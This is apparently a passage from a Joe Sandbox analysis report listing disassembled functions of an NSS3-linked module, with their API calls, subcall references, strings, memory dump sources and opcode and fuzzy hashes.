EnterCriticalSection.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 6C702E66
TlsGetValue.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 6C702E7B
EnterCriticalSection.KERNEL32(00000000), ref: 6C702E8F
PL_HashTableLookup.NSS3(?,?), ref: 6C702E9E
PR_Unlock.NSS3(?), ref: 6C702EAB
PR_Unlock.NSS3(?), ref: 6C702F0D

Memory Dump Source

Source File: 00000000.00000002.2032319543.000000006C661000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C660000, based on PE: true

Associated: 00000000.00000002.2032302336.000000006C660000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032465018.000000006C7FF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032497178.000000006C83E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032522655.000000006C83F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032541748.000000006C840000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032567747.000000006C845000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c660000_file.jbxd

Similarity

API ID: CriticalEnterSectionUnlockValue$HashLookupTable
String ID:
API String ID: 3106257965-0
Opcode ID: 82901cd9494eb5f83e44917606f8e8bf0e3942ee873efd929ba96562710bd9df
Instruction ID: 3eefb8e42ecb65ec50ef9cf3981395e381c0639c14438c980e58bb0631cc5f00
Opcode Fuzzy Hash: 82901cd9494eb5f83e44917606f8e8bf0e3942ee873efd929ba96562710bd9df
Instruction Fuzzy Hash: 5A310AB6B00105ABEB106F64DC8886AB7B9FF4625CB158575ED18C7711EB31EC64C7E0

Function 6C721EA0 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 91COMMON

Download Yara Rule

APIs

PR_SetError.NSS3(FFFFE002,00000000,?,00000001,?,S&rl,6C706295,?,00000000,?,00000001,S&rl,?), ref: 6C721ECB

Part of subcall function 6C78C2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C78C2BF

TlsGetValue.KERNEL32(?,00000001,?,S&rl,6C706295,?,00000000,?,00000001,S&rl,?), ref: 6C721EF1
EnterCriticalSection.KERNEL32(?), ref: 6C721F01
PR_SetError.NSS3(00000000,00000000), ref: 6C721F39

Part of subcall function 6C72FE20: TlsGetValue.KERNEL32(6C705ADC,?,00000000,00000001,?,?,00000000,?,6C6FBA55,?,?), ref: 6C72FE4B
Part of subcall function 6C72FE20: EnterCriticalSection.KERNEL32(78831D90,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 6C72FE5F

PR_Unlock.NSS3(?), ref: 6C721F67

Strings

S&rl, xrefs: 6C721EA0

Memory Dump Source

Source File: 00000000.00000002.2032319543.000000006C661000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C660000, based on PE: true

Associated: 00000000.00000002.2032302336.000000006C660000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032465018.000000006C7FF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032497178.000000006C83E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032522655.000000006C83F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032541748.000000006C840000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032567747.000000006C845000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c660000_file.jbxd

Similarity

API ID: Value$CriticalEnterErrorSection$Unlock
String ID: S&rl
API String ID: 704537481-2637263621
Opcode ID: 3c758f008797d5798d2676166c0ee552a775fe779978937525b942dfd75839d1
Instruction ID: 8fe47c2080e4824a968a1a9796c9bc8ae73c0a0adcf5f303e8e04de770fc222e
Opcode Fuzzy Hash: 3c758f008797d5798d2676166c0ee552a775fe779978937525b942dfd75839d1
Instruction Fuzzy Hash: 89210672A01104ABDB20AE29ED48E9A3769FF4136DF194134FD2887701E736DD54C7E0

Function 6C74CEE0 Relevance: 10.6, APIs: 7, Instructions: 79memoryCOMMON

Download Yara Rule

APIs

PORT_ArenaMark_Util.NSS3(?,6C74CD93,?), ref: 6C74CEEE

Part of subcall function 6C7414C0: TlsGetValue.KERNEL32 ref: 6C7414E0
Part of subcall function 6C7414C0: EnterCriticalSection.KERNEL32 ref: 6C7414F5
Part of subcall function 6C7414C0: PR_Unlock.NSS3 ref: 6C74150D

PORT_ArenaAlloc_Util.NSS3(?,00000018,?,6C74CD93,?), ref: 6C74CEFC

Part of subcall function 6C7410C0: TlsGetValue.KERNEL32(?,6C6E8802,00000000,00000008,?,6C6DEF74,00000000), ref: 6C7410F3
Part of subcall function 6C7410C0: EnterCriticalSection.KERNEL32(?,?,6C6E8802,00000000,00000008,?,6C6DEF74,00000000), ref: 6C74110C
Part of subcall function 6C7410C0: PL_ArenaAllocate.NSS3(?,?,?,6C6E8802,00000000,00000008,?,6C6DEF74,00000000), ref: 6C741141
Part of subcall function 6C7410C0: PR_Unlock.NSS3(?,?,?,6C6E8802,00000000,00000008,?,6C6DEF74,00000000), ref: 6C741182
Part of subcall function 6C7410C0: TlsGetValue.KERNEL32(?,6C6E8802,00000000,00000008,?,6C6DEF74,00000000), ref: 6C74119C

SECOID_FindOIDByTag_Util.NSS3(00000023,?,?,?,6C74CD93,?), ref: 6C74CF0B

Part of subcall function 6C740840: PR_SetError.NSS3(FFFFE08F,00000000), ref: 6C7408B4

SECITEM_CopyItem_Util.NSS3(?,00000000,00000000,?,?,?,?,6C74CD93,?), ref: 6C74CF1D

Part of subcall function 6C73FB60: PORT_ArenaAlloc_Util.NSS3(00000000,E0056800,00000000,?,?,6C738D2D,?,00000000,?), ref: 6C73FB85
Part of subcall function 6C73FB60: memcpy.VCRUNTIME140(00000000,6A1BEBC6,E0056800,?), ref: 6C73FBB1

PORT_ArenaAlloc_Util.NSS3(?,00000008,?,?,?,?,?,?,?,6C74CD93,?), ref: 6C74CF47
PORT_ArenaAlloc_Util.NSS3(?,0000000C,?,?,?,?,?,?,?,?,?,6C74CD93,?), ref: 6C74CF67
SECITEM_CopyItem_Util.NSS3(?,00000000,6C74CD93,?,?,?,?,?,?,?,?,?,?,?,6C74CD93,?), ref: 6C74CF78

Memory Dump Source

Source File: 00000000.00000002.2032319543.000000006C661000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C660000, based on PE: true

Associated: 00000000.00000002.2032302336.000000006C660000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032465018.000000006C7FF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032497178.000000006C83E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032522655.000000006C83F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032541748.000000006C840000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032567747.000000006C845000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c660000_file.jbxd

Similarity

API ID: Util$Arena$Alloc_$Value$CopyCriticalEnterItem_SectionUnlock$AllocateErrorFindMark_Tag_memcpy
String ID:
API String ID: 4291907967-0
Opcode ID: a3aab832d6a22432be4a6ae88c8f79b101dc4fa96841c8453af480ac5133103c
Instruction ID: 7551141f96ae2c48437e0abaaf5b0a0199388e32de31b819a0d00c1f501b1f18
Opcode Fuzzy Hash: a3aab832d6a22432be4a6ae88c8f79b101dc4fa96841c8453af480ac5133103c
Instruction Fuzzy Hash: 4511B4B6E002045BEB00AA7A7E49B6BB5EC9F5454EF048039EC09D7B41FB75D91CC6B1

Function 6C6F8C00 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 75memoryCOMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32 ref: 6C6F8C1B
EnterCriticalSection.KERNEL32 ref: 6C6F8C34
PL_ArenaAllocate.NSS3 ref: 6C6F8C65
PR_Unlock.NSS3 ref: 6C6F8C9C
PR_Unlock.NSS3 ref: 6C6F8CB6

Part of subcall function 6C78DD70: TlsGetValue.KERNEL32 ref: 6C78DD8C
Part of subcall function 6C78DD70: LeaveCriticalSection.KERNEL32(00000000), ref: 6C78DDB4

Strings

KRAM, xrefs: 6C6F8C8F

Memory Dump Source

Source File: 00000000.00000002.2032319543.000000006C661000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C660000, based on PE: true

Associated: 00000000.00000002.2032302336.000000006C660000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032465018.000000006C7FF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032497178.000000006C83E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032522655.000000006C83F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032541748.000000006C840000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032567747.000000006C845000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c660000_file.jbxd

Similarity

API ID: CriticalSectionUnlockValue$AllocateArenaEnterLeave
String ID: KRAM
API String ID: 4127063985-3815160215
Opcode ID: 5e8dd061cbb8369a5540d1fc52aa86f72a16081162a370a98d0623a5c9392e2d
Instruction ID: c2ed48de8823d25f94b2a0362030dffcf38c2bcb98e2790da71799f145d072c5
Opcode Fuzzy Hash: 5e8dd061cbb8369a5540d1fc52aa86f72a16081162a370a98d0623a5c9392e2d
Instruction Fuzzy Hash: D42191B16056018FD700AF79C498559BBF5FF0A308F0589AED8988B711DB35D886CB99

Function 6C708E80 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 71COMMON

Download Yara Rule

APIs

PK11_GetInternalKeySlot.NSS3(?,?,?,6C722E62,?,?,?,?,?,?,?,00000000,?,?,?,6C6F4F1C), ref: 6C708EA2

Part of subcall function 6C72F820: free.MOZGLUE(6A1B7500,2404110F,?,?), ref: 6C72F854
Part of subcall function 6C72F820: free.MOZGLUE(FFD3F9E8,2404110F,?,?), ref: 6C72F868
Part of subcall function 6C72F820: DeleteCriticalSection.KERNEL32(04C4841B,2404110F,?,?), ref: 6C72F882
Part of subcall function 6C72F820: free.MOZGLUE(04C483FF,?,?), ref: 6C72F889
Part of subcall function 6C72F820: DeleteCriticalSection.KERNEL32(CCCCCCDF,2404110F,?,?), ref: 6C72F8A4
Part of subcall function 6C72F820: free.MOZGLUE(CCCCCCC3,?,?), ref: 6C72F8AB
Part of subcall function 6C72F820: DeleteCriticalSection.KERNEL32(280F1108,2404110F,?,?), ref: 6C72F8C9
Part of subcall function 6C72F820: free.MOZGLUE(280F10EC,?,?), ref: 6C72F8D0

PK11_IsLoggedIn.NSS3(?,?,?,6C722E62,?,?,?,?,?,?,?,00000000,?,?,?,6C6F4F1C), ref: 6C708EC3
TlsGetValue.KERNEL32(?,?,?,6C722E62,?,?,?,?,?,?,?,00000000,?,?,?,6C6F4F1C), ref: 6C708EDC
EnterCriticalSection.KERNEL32(?,?,?,?,6C722E62,?,?,?,?,?,?,?,00000000,?,?), ref: 6C708EF1
PR_Unlock.NSS3 ref: 6C708F20

Strings

b.rl, xrefs: 6C708E96, 6C708F25

Memory Dump Source

Source File: 00000000.00000002.2032319543.000000006C661000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C660000, based on PE: true

Associated: 00000000.00000002.2032302336.000000006C660000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032465018.000000006C7FF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032497178.000000006C83E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032522655.000000006C83F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032541748.000000006C840000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032567747.000000006C845000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c660000_file.jbxd

Similarity

API ID: free$CriticalSection$Delete$K11_$EnterInternalLoggedSlotUnlockValue
String ID: b.rl
API String ID: 1978757487-3686120825
Opcode ID: 72e5610b541ecd80ea01fb49c43560443e3e747f47e8913e0ed2bad31aed7f60
Instruction ID: 033651fd27de953745927a8537deaafc7432f0403bd73969437c02cdbfe79583
Opcode Fuzzy Hash: 72e5610b541ecd80ea01fb49c43560443e3e747f47e8913e0ed2bad31aed7f60
Instruction Fuzzy Hash: C1217EB0A096059FC700AF39D688599BBF4FF48318F05466EE8989BB41D730E854CBD2

Function 6C773E20 Relevance: 10.6, APIs: 7, Instructions: 70COMMON

Download Yara Rule

APIs

Part of subcall function 6C775B40: PR_GetIdentitiesLayer.NSS3 ref: 6C775B56

PR_EnterMonitor.NSS3(?), ref: 6C773E45

Part of subcall function 6C7A9090: TlsGetValue.KERNEL32 ref: 6C7A90AB
Part of subcall function 6C7A9090: TlsGetValue.KERNEL32 ref: 6C7A90C9
Part of subcall function 6C7A9090: EnterCriticalSection.KERNEL32 ref: 6C7A90E5
Part of subcall function 6C7A9090: TlsGetValue.KERNEL32 ref: 6C7A9116
Part of subcall function 6C7A9090: LeaveCriticalSection.KERNEL32 ref: 6C7A913F

PR_EnterMonitor.NSS3(?), ref: 6C773E5C
PR_EnterMonitor.NSS3(?), ref: 6C773E73
PR_SetError.NSS3(FFFFE8D5,00000000), ref: 6C773EA6

Part of subcall function 6C78C2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C78C2BF

PR_ExitMonitor.NSS3(?), ref: 6C773EC0
PR_ExitMonitor.NSS3(?), ref: 6C773ED7
PR_ExitMonitor.NSS3(?), ref: 6C773EEE

Memory Dump Source

Source File: 00000000.00000002.2032319543.000000006C661000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C660000, based on PE: true

Associated: 00000000.00000002.2032302336.000000006C660000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032465018.000000006C7FF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032497178.000000006C83E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032522655.000000006C83F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032541748.000000006C840000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032567747.000000006C845000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c660000_file.jbxd

Similarity

API ID: Monitor$EnterValue$Exit$CriticalSection$ErrorIdentitiesLayerLeave
String ID:
API String ID: 2517541793-0
Opcode ID: 54027f88e9f8c7aef8774f630c25a29e5d64c5ae93700a839b1c12e084a23d9d
Instruction ID: 8856d586ec0db9ebf6469a943385963693ebefbe56c5cb025083340cfe930c30
Opcode Fuzzy Hash: 54027f88e9f8c7aef8774f630c25a29e5d64c5ae93700a839b1c12e084a23d9d
Instruction Fuzzy Hash: 5E112B71550604AFDF315E69FE0ABC777A5DB50308F400934E55986A22E673E429C753

Function 6C7F2C80 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 61stringCOMMON

Download Yara Rule

APIs

PR_EnterMonitor.NSS3 ref: 6C7F2CA0
PR_ExitMonitor.NSS3 ref: 6C7F2CBE
calloc.MOZGLUE(00000001,00000014), ref: 6C7F2CD1
strdup.MOZGLUE(?), ref: 6C7F2CE1
PR_LogPrint.NSS3(Loaded library %s (static lib),00000000), ref: 6C7F2D27

Strings

Loaded library %s (static lib), xrefs: 6C7F2D22

Memory Dump Source

Source File: 00000000.00000002.2032319543.000000006C661000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C660000, based on PE: true

Associated: 00000000.00000002.2032302336.000000006C660000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032465018.000000006C7FF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032497178.000000006C83E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032522655.000000006C83F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032541748.000000006C840000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032567747.000000006C845000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c660000_file.jbxd

Similarity

API ID: Monitor$EnterExitPrintcallocstrdup
String ID: Loaded library %s (static lib)
API String ID: 3511436785-2186981405
Opcode ID: 2798ecf8db5e09fe7020f34975a59c08e9764f03031f01c92234cba1bd119fbc
Instruction ID: ce192bb5c136fb1b45666724a518dabeb9fd2aae29b49bcd0b53b1bf410af1aa
Opcode Fuzzy Hash: 2798ecf8db5e09fe7020f34975a59c08e9764f03031f01c92234cba1bd119fbc
Instruction Fuzzy Hash: DB1122B06002908FEB209F19E988A667BB4AB4630DF04853DD819C7B01E731EC1ACBE1

Function 6C6EBDC0 Relevance: 10.6, APIs: 7, Instructions: 54memoryCOMMON

Download Yara Rule

APIs

PORT_NewArena_Util.NSS3(00000800), ref: 6C6EBDCA

Part of subcall function 6C740FF0: calloc.MOZGLUE(00000001,00000024,00000000,?,?,6C6E87ED,00000800,6C6DEF74,00000000), ref: 6C741000
Part of subcall function 6C740FF0: PR_NewLock.NSS3(?,00000800,6C6DEF74,00000000), ref: 6C741016
Part of subcall function 6C740FF0: PL_InitArenaPool.NSS3(00000000,security,6C6E87ED,00000008,?,00000800,6C6DEF74,00000000), ref: 6C74102B

PORT_ArenaAlloc_Util.NSS3(00000000,0000000C), ref: 6C6EBDDB

Part of subcall function 6C7410C0: TlsGetValue.KERNEL32(?,6C6E8802,00000000,00000008,?,6C6DEF74,00000000), ref: 6C7410F3
Part of subcall function 6C7410C0: EnterCriticalSection.KERNEL32(?,?,6C6E8802,00000000,00000008,?,6C6DEF74,00000000), ref: 6C74110C
Part of subcall function 6C7410C0: PL_ArenaAllocate.NSS3(?,?,?,6C6E8802,00000000,00000008,?,6C6DEF74,00000000), ref: 6C741141
Part of subcall function 6C7410C0: PR_Unlock.NSS3(?,?,?,6C6E8802,00000000,00000008,?,6C6DEF74,00000000), ref: 6C741182
Part of subcall function 6C7410C0: TlsGetValue.KERNEL32(?,6C6E8802,00000000,00000008,?,6C6DEF74,00000000), ref: 6C74119C

PORT_ArenaAlloc_Util.NSS3(00000000,0000000C), ref: 6C6EBDEC

Part of subcall function 6C7410C0: PL_ArenaAllocate.NSS3(?,6C6E8802,00000000,00000008,?,6C6DEF74,00000000), ref: 6C74116E

SECITEM_CopyItem_Util.NSS3(00000000,00000000,?), ref: 6C6EBE03

Part of subcall function 6C73FB60: PORT_ArenaAlloc_Util.NSS3(00000000,E0056800,00000000,?,?,6C738D2D,?,00000000,?), ref: 6C73FB85
Part of subcall function 6C73FB60: memcpy.VCRUNTIME140(00000000,6A1BEBC6,E0056800,?), ref: 6C73FBB1

PR_SetError.NSS3(FFFFE013,00000000), ref: 6C6EBE22
PR_SetError.NSS3(FFFFE013,00000000), ref: 6C6EBE30
PORT_FreeArena_Util.NSS3(00000000,00000000), ref: 6C6EBE3B

Memory Dump Source

Source File: 00000000.00000002.2032319543.000000006C661000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C660000, based on PE: true

Associated: 00000000.00000002.2032302336.000000006C660000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032465018.000000006C7FF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032497178.000000006C83E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032522655.000000006C83F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032541748.000000006C840000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032567747.000000006C845000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c660000_file.jbxd

Similarity

API ID: ArenaUtil$Alloc_$AllocateArena_ErrorValue$CopyCriticalEnterFreeInitItem_LockPoolSectionUnlockcallocmemcpy
String ID:
API String ID: 1821307800-0
Opcode ID: 49bd7be85a6d6651bfacdc823afd404720f93631e91d5564c55d0a1637df6a24
Instruction ID: 875ad304a347164fafad8037909123813941e217bb9e54bb9b33eb3ca4327175
Opcode Fuzzy Hash: 49bd7be85a6d6651bfacdc823afd404720f93631e91d5564c55d0a1637df6a24
Instruction Fuzzy Hash: 66012BA5A4631167F61022667D0DFAB26484F903DEF144132EF0496BC2FB50D51A82BD

Function 6C740FF0 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 54COMMON

Download Yara Rule

APIs

calloc.MOZGLUE(00000001,00000024,00000000,?,?,6C6E87ED,00000800,6C6DEF74,00000000), ref: 6C741000
PR_NewLock.NSS3(?,00000800,6C6DEF74,00000000), ref: 6C741016

Part of subcall function 6C7A98D0: calloc.MOZGLUE(00000001,00000084,6C6D0936,00000001,?,6C6D102C), ref: 6C7A98E5

PL_InitArenaPool.NSS3(00000000,security,6C6E87ED,00000008,?,00000800,6C6DEF74,00000000), ref: 6C74102B
TlsGetValue.KERNEL32(00000000,?,?,6C6E87ED,00000800,6C6DEF74,00000000), ref: 6C741044
free.MOZGLUE(00000000,?,00000800,6C6DEF74,00000000), ref: 6C741064

Strings

security, xrefs: 6C741025

Memory Dump Source

Source File: 00000000.00000002.2032319543.000000006C661000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C660000, based on PE: true

Associated: 00000000.00000002.2032302336.000000006C660000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032465018.000000006C7FF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032497178.000000006C83E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032522655.000000006C83F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032541748.000000006C840000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032567747.000000006C845000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c660000_file.jbxd

Similarity

API ID: calloc$ArenaInitLockPoolValuefree
String ID: security
API String ID: 3379159031-3315324353
Opcode ID: f8c3c95eeae789e304d575b2d43e3b2d7cd6eab28ac13a23493665997a78bcc3
Instruction ID: c02562b21932a581a5f88f6b5a26aa2589956940bc1d83caaf0e197acb6645e1
Opcode Fuzzy Hash: f8c3c95eeae789e304d575b2d43e3b2d7cd6eab28ac13a23493665997a78bcc3
Instruction Fuzzy Hash: D101487064025057E7303F3D9E08B563AA8BF0274EF028635E80896A62EB60C124DBD1

Function 6C771C60 Relevance: 10.5, APIs: 7, Instructions: 49COMMON

Download Yara Rule

APIs

PR_SetError.NSS3(FFFFE001,00000000), ref: 6C771C74

Part of subcall function 6C78C2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C78C2BF

DeleteCriticalSection.KERNEL32(?), ref: 6C771C92
free.MOZGLUE(?), ref: 6C771C99
DeleteCriticalSection.KERNEL32(?), ref: 6C771CCB
free.MOZGLUE(?), ref: 6C771CD2

Memory Dump Source

Source File: 00000000.00000002.2032319543.000000006C661000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C660000, based on PE: true

Associated: 00000000.00000002.2032302336.000000006C660000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032465018.000000006C7FF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032497178.000000006C83E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032522655.000000006C83F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032541748.000000006C840000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032567747.000000006C845000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c660000_file.jbxd

Similarity

API ID: CriticalDeleteSectionfree$ErrorValue
String ID:
API String ID: 3805613680-0
Opcode ID: 26f5f5884f1869ef3b11d65ed274a630815a8d61c0daef374c661e19182bf493
Instruction ID: 70396a5f2b1fa605aea83e30b80f95876bf94a357d3e450b6d311ef342572148
Opcode Fuzzy Hash: 26f5f5884f1869ef3b11d65ed274a630815a8d61c0daef374c661e19182bf493
Instruction Fuzzy Hash: 230184B1E092245FDE30FFE49E0DB453778670631DF544635EA0DE6A41D7259104C7E1

Function 6C782E50 Relevance: 9.3, APIs: 6, Instructions: 251COMMON

Download Yara Rule

APIs

memcpy.VCRUNTIME140(?,?,00000000), ref: 6C783046

Part of subcall function 6C76EE50: PR_SetError.NSS3(FFFFE013,00000000), ref: 6C76EE85

PK11_AEADOp.NSS3(?,00000004,?,?,?,?,?,00000000,?,B8830845,?,?,00000000,6C757FFB), ref: 6C78312A
memcpy.VCRUNTIME140(00000000,?,?), ref: 6C783154
PR_SetError.NSS3(FFFFE001,00000000), ref: 6C782E8B

Part of subcall function 6C78C2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C78C2BF

Part of subcall function 6C76F110: PR_SetError.NSS3(FFFFE013,00000000,00000000,0000A48E,00000000,?,6C759BFF,?,00000000,00000000), ref: 6C76F134

memcpy.VCRUNTIME140(8B3C75C0,?,6C757FFA), ref: 6C782EA4
PR_SetError.NSS3(FFFFE005,00000000), ref: 6C78317B

Memory Dump Source

Source File: 00000000.00000002.2032319543.000000006C661000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C660000, based on PE: true

Associated: 00000000.00000002.2032302336.000000006C660000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032465018.000000006C7FF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032497178.000000006C83E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032522655.000000006C83F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032541748.000000006C840000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032567747.000000006C845000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c660000_file.jbxd

Similarity

API ID: Error$memcpy$K11_Value
String ID:
API String ID: 2334702667-0
Opcode ID: 45db410c720fe8c34a60a03cfdcaf047751423be9ad6228a7d7439846f5f0762
Instruction ID: 472390d2c70e0835c9e4de66d98f2cc8e0d90ddb4a73676044fcc8523543b8bd
Opcode Fuzzy Hash: 45db410c720fe8c34a60a03cfdcaf047751423be9ad6228a7d7439846f5f0762
Instruction Fuzzy Hash: 86A1B071A002189FDB24CF54CD88BEAB7B5EF49308F1481A9EE4967741E731AD45CFA1

Function 6C74ED00 Relevance: 9.2, APIs: 6, Instructions: 228memoryCOMMON

Download Yara Rule

APIs

PORT_ArenaAlloc_Util.NSS3(?,00000000), ref: 6C74ED6B
PORT_Alloc_Util.NSS3(00000000), ref: 6C74EDCE

Part of subcall function 6C740BE0: malloc.MOZGLUE(6C738D2D,?,00000000,?), ref: 6C740BF8
Part of subcall function 6C740BE0: TlsGetValue.KERNEL32(6C738D2D,?,00000000,?), ref: 6C740C15

free.MOZGLUE(00000000,?,?,?,?,6C74B04F), ref: 6C74EE46
PORT_ArenaAlloc_Util.NSS3(?,?), ref: 6C74EECA
PORT_ArenaAlloc_Util.NSS3(?,0000000C), ref: 6C74EEEA
PORT_ArenaAlloc_Util.NSS3(?,00000008), ref: 6C74EEFB

Memory Dump Source

Source File: 00000000.00000002.2032319543.000000006C661000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C660000, based on PE: true

Associated: 00000000.00000002.2032302336.000000006C660000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032465018.000000006C7FF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032497178.000000006C83E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032522655.000000006C83F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032541748.000000006C840000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032567747.000000006C845000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c660000_file.jbxd

Similarity

API ID: Alloc_Util$Arena$Valuefreemalloc
String ID:
API String ID: 3768380896-0
Opcode ID: 2cd8ef9c6415934a3004561e6e61556a35d8637db091a718b629c2bc3c265fbe
Instruction ID: d7e3a68aac50215266377f28402f8730edaaee703af138d3d8487616c8646b95
Opcode Fuzzy Hash: 2cd8ef9c6415934a3004561e6e61556a35d8637db091a718b629c2bc3c265fbe
Instruction Fuzzy Hash: DA816CB5A002099FEB14CF55DA85FABB7F9BF88318F148438E8159B751D730E815CBA1

